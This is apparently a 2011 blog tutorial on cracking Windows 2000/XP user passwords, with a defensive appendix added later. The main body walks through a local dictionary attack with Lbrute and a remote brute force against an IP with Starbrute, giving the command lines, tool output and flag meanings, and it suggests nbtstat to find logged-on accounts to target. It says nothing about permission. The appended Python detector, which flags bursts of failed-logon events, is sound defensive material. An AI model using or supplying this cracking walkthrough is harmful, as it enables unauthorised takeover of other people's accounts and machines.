
Saturday 18 June 2011

Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of an account on your local machine or on a remote machine, you can either brute force the account or run a dictionary attack against it. Remember that this can take anywhere from a minute to a few days, depending on how complex the password is.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

The first program we will use is LBRUTE.

Lbrute is a program you can use to guess a user account's password with a dictionary attack while logged onto the machine locally. You will need a wordlist that Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar < warl0ck@metaeye.org>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account you're trying to crack

-f is the name of the wordlist you will be using

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

The second program we will use is Starbrute.

Starbrute can be used to crack a user account either on your own local PC or on a remote PC. Starbrute uses brute force to guess the password, meaning it will try combinations from the charset 1234567890abcdefghijklmnopqrstuvwxyz in random order until it guesses the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

════════ Starsky32 IPC bruteforce ════════

▓ Target IP:192.168.0.3
▓ User Account:guest
▓ Charset:1234567890abcdefghijklmnopqrstuvwxyz
▓ Start lenght:3
▓ Max lenght:4
▓ Process priority: High

■ Starting...
» Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

192.168.0.3 is the IP of the machine you're trying to get the account password from.

guest is the account name you're trying to crack

3 is the starting length of the password

4 is the maximum length of the password

high means the program will use a lot of resources; the higher the priority, the faster it can guess the password

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

With both of these programs you can specify any account on a machine: administrator, guest, or whatever.

Remember you can find out what account is logged onto a machine by typing this command into CMD: nbtstat -a IP

It will show you the username currently logged on, and then you can try to crack that account's password.
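Both tools leave the same trace on the target: a burst of failed logons (Windows Security event 4625) against one account, with the remote Starbrute run arriving over the network (logon type 3). The following detector is an added example, not code from this post or from either tool; the event records are constructed, reduced to the 4625/4624 fields that matter, and the threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def make_events():
    """Constructed sample of Security log records: event 4625 = failed logon,
    4624 = successful logon, logon_type 3 = network (SMB/IPC$), 2 = console."""
    base = datetime(2011, 6, 18, 10, 0, 0)
    events = []
    # 12 network failures against 'guest' two seconds apart: a remote guessing run
    for i in range(12):
        events.append(dict(time=base + timedelta(seconds=2 * i), event=4625,
                           user="guest", logon_type=3, src="192.168.0.9"))
    # two console failures an hour apart: an ordinary mistyped password
    for h in (1, 2):
        events.append(dict(time=base + timedelta(hours=h), event=4625,
                           user="alice", logon_type=2, src="-"))
    # a success from the same source right after the burst: the guess worked
    events.append(dict(time=base + timedelta(seconds=25), event=4624,
                       user="guest", logon_type=3, src="192.168.0.9"))
    return events


def detect_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Group 4625 failures by (source, account) and alert when `threshold` or
    more fall inside any span of length `window`. Each alert also records
    whether a 4624 success for the same pair followed the last failure,
    which is the case that needs an immediate password reset."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        key = (e["src"], e["user"])
        (failures if e["event"] == 4625 else successes)[key].append(e["time"])
    alerts = []
    for key, times in failures.items():
        times.sort()
        j, peak = 0, 0
        for i in range(len(times)):          # sliding window over sorted times
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            peak = max(peak, j - i)
        if peak >= threshold:
            last_fail = times[-1]
            followed = any(t >= last_fail for t in successes.get(key, []))
            alerts.append({"src": key[0], "user": key[1],
                           "failures": peak, "success_after": followed})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(make_events()):
        print(a)
```

Against the sample this flags only the 192.168.0.9/guest pair (12 failures, followed by a success); the two console typos stay below the threshold.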